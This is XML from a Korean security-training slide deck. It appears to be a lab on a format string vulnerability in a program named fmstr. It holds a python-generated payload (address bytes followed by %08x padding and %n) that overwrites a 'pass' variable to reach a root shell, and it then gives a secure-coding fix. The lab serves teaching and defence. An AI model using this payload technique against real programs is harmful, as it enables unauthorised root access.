              <a:t>단위과제</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9C136229-DC6D-4832-AE41-633A488FB1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3912196076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1200647" y="1690688"/>
          <a:ext cx="8696217" cy="4915353"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791155">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2591050968"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="791155">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="154879271"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="591744">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="813017851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="761651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3701053458"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="761651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2491820619"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="650752">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3287896795"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="795758">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3972815226"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="795758">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1427950572"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="582538">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="667526490"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="746377">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2599313690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="746377">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="936026796"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="681301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3876049538"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="80417">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61040702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="80604">
                <a:tc rowSpan="1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36330169"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="152872">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5441990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948444135"/>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2404462"/>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47108898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1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781709824"/>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438102888"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213929">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855849059"/>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19235825"/>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012911296"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="15287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3530213"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="122344">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0313057"/>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839190491"/>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1894799"/>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411618548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="204735">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861112270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="163788">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1325950854"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="122841">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2543045"/>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8372165"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37478675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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 되도록 공격 및 루트 권한으로 실행할 명령 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>입력창</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%76x.%08n“’)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로 변경되어 루트 권한으로 명령을 실행시킬 수 있는 프롬프트가 등장</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8)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endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6589769-D3DB-461C-9422-07580D15006E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" r="-782" b="9246"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479404" y="1085425"/>
            <a:ext cx="5442227" cy="1318996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A4B83F5-6C76-4AE9-A33C-D8DEA8F451B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="885533322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="462566"/>
          <a:ext cx="5352566" cy="4151376"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5352566">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="56090381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291666905"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39051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962474"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68609" name="_x617371528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C24BBB6-4DE7-4678-BAA1-C8F9247FB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543" y="1003287"/>
            <a:ext cx="4803775" cy="3594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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6BA5BDA-2224-416F-B4ED-57AC93DA5136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1" t="63142" r="30"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317137" y="5154663"/>
            <a:ext cx="4981050" cy="1021578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562120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1FA8A66-0FC4-40A5-BC51-C1EA3C9110D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="356331"/>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다시 공격을 실시하여 루트 권한 쉘 획득 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136996093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DE520DA-B504-4C1C-8096-919BFF01D7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17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD3A2F5-6F8D-463B-9CA5-E4E12BE65F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2E53C2E-B931-4F95-9DFB-30866880C268}"/>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3C1D8E86-851C-4874-937A-9DD64EA82A87}"/>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29FCFC1C-5E87-435E-B4F3-DB0D38C6C5C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721C875A-961A-4C72-8951-8799030E48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74241C0-E0AC-4A46-BB1D-8FAFA9A8B54F}"/>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5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42721273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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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다음 명령을 입력하여 루트 권한으로 명령을 실행할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.%76x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.%08n</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</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함수 사용으로 포맷 스트링 취약점이 존재함을 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71289408-266B-4678-95B9-C39EDF85F58E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521252" y="1729482"/>
            <a:ext cx="4877816" cy="1268222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 132">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3280749-911A-45C3-8C2E-C33736B18870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="3621892"/>
            <a:ext cx="4954016" cy="2797683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208F48A0-69F8-402A-952F-CA7A5DE027EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1449" t="-234" r="863" b="753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308408" y="1284923"/>
            <a:ext cx="4852987" cy="2671762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340801409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취약한 부분 수정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 코딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>], sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buff));</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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–o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> getRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.o</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9515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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5C04B0-1A90-499C-B432-34A9F9351D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1424" t="833" r="930" b="605"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="875348"/>
            <a:ext cx="4791076" cy="2643187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065DD0D5-E074-41EA-BCE1-13FD88348094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1461" t="13394" r="804" b="69595"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="4093465"/>
            <a:ext cx="4905375" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92AFE8B1-4B5F-452F-B39E-14DBCF12861B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1797" t="13987" r="271" b="75784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="5147503"/>
            <a:ext cx="4830128" cy="323657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8CA100-2841-49EB-8217-4CDEDF3A1B35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3860427977"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6289547" y="475614"/>
          <a:ext cx="5390959" cy="3661855"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
